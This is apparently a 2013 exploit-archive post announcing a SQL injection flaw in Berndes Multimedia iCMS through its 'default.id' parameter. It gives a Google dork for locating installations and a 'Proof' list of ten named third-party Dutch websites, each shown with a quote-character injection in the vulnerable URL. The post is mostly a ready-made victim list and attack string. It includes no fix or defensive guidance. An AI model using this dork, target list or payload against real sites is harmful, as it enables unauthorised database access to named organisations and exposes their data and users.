Berndes Multimedia iCMS suffers from a remote SQL injection vulnerability. Note that this advisory has site-specific information.
78fa3512dc7a04e99bc4bc3f44b854083212008a8f8eb037c7e97fe946de7325
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
| [/] Exploit Title: Berndes Multimedia iCMS Sql Injection
Vulnerability
|
| [\] Exploit Author: Ashiyane Digital Security Team
|
| [/] Software Link : http://www.berndesmultimedia.nl
|
| [\] Google Dork: intext:"powered by Berndes Multimedia iCMS"
|
| [/] Tested on: Windows,Linux
|
| [\] Date : 2013/09/13
|-------------------------------------------------------------------------|
| [\] Exploit: Sql Injection
| [/] Location : [Target]l/default.id=[Sql
Injection]
|-------------------------------------------------------------------------|
| [/] Proof:
|
| [\] http://www.askoi.nl/default.id='
|
| [/] http://www.boikon.nl/default.id='
| [\] http://www.battlestars.nl/default.id='
|
| [/] http://www.dgtomassentransport.nl/default.id='
|
| [\] http://www.fraai-buiten.nl/default.id='
|
| [/] http://www.jongdementerend.nl/default.id='
|
| [\] http://www.vijfdeverloting.nl/default.id='
|
| [/] http://www.seniorenwegwijzer.nl/default.id='
|
| [/] http://www.vredewold.nl/default.id='
|
| [\] http://www.kamp-bouwadvies.nl/default.id='
|-------------------------------------------------------------------------|
| [/] Discovered By :
ACC3SS
|-------------------------------------------------------------------------|
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|